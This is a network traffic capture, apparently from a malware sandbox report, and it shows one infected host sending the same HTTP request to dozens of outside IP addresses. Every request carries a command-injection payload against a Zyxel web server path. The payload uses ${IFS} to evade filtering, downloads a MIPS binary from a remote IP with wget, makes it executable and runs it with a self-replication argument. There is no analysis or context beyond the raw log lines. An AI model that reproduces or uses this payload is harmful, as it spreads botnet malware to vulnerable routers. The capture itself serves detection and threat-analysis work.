                                      Jan 14, 2024 15:50:31.954735994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      635192.168.2.1439168109.222.53.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954771996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      636192.168.2.1437914206.199.210.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954803944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      637192.168.2.14403701.6.64.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954859018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      638192.168.2.145735443.69.239.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954895020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      639192.168.2.144361881.90.224.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954922915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      640192.168.2.144244293.31.251.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.954968929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      641192.168.2.1449240156.44.182.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955010891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      642192.168.2.144321641.175.227.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955051899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      643192.168.2.1451576209.100.144.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955074072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      644192.168.2.1452452196.21.43.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955120087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      645192.168.2.145847287.220.50.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955141068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      646192.168.2.143513668.59.250.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955210924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      647192.168.2.1447496154.199.114.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955238104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      648192.168.2.1436428119.194.29.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955282927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      649192.168.2.1450306195.199.251.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955319881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      650192.168.2.1458972197.243.112.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955365896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      651192.168.2.1445144128.208.144.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955415964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      652192.168.2.146006477.134.187.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955455065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      653192.168.2.144587438.172.184.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955486059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      654192.168.2.1442676110.117.55.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955514908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      655192.168.2.1458582142.211.220.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955564022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      656192.168.2.144159246.154.44.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955584049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      657192.168.2.1449892191.213.20.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955641031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      658192.168.2.1445988131.119.139.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955692053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      659192.168.2.144129824.51.25.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955739975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      660192.168.2.1455240144.40.208.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955769062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      661192.168.2.1441994147.26.100.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955818892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      662192.168.2.1447404197.252.170.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955863953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      663192.168.2.145759458.185.92.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955892086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      664192.168.2.143369448.201.183.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955923080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      665192.168.2.143354665.13.54.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.955982924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      666192.168.2.1454764176.16.71.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956007004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      667192.168.2.1448782169.84.49.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956060886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      668192.168.2.1440562142.202.198.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956113100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      669192.168.2.144134099.210.49.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956139088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      670192.168.2.1434216149.43.71.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956181049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      671192.168.2.145057818.215.236.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956212044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      672192.168.2.144560272.222.209.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956248999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      673192.168.2.1435088154.237.10.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956290007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      674192.168.2.1453064163.22.197.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956334114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      675192.168.2.145532071.123.144.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956357002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      676192.168.2.1435916192.234.195.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956408978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      677192.168.2.144717035.71.9.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956434965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      678192.168.2.1437366159.202.103.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956500053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      679192.168.2.1441076164.59.236.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956552029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      680192.168.2.144195854.88.126.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956587076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      681192.168.2.145389299.16.186.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956619978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      682192.168.2.145470496.249.87.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956662893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      683192.168.2.144373677.189.143.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956695080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      684192.168.2.144339276.149.110.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956742048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      685192.168.2.1447196126.157.112.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956767082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      686192.168.2.1458554114.165.129.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956809998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      687192.168.2.145722685.75.186.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956845999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      688192.168.2.1445206105.242.44.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956875086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      689192.168.2.1442066201.39.132.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956912994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      690192.168.2.143311697.41.32.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.956949949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      691192.168.2.1455504102.16.14.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957020044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      692192.168.2.1446046155.23.27.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957056999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      693192.168.2.1459466198.162.161.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957104921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      694192.168.2.143960268.86.118.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957129955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      695192.168.2.1439170169.12.45.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957166910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      696192.168.2.1437720129.39.45.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:31.957214117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      697192.168.2.1455490118.120.38.129443
                                      TimestampBytes transferredDirectionData
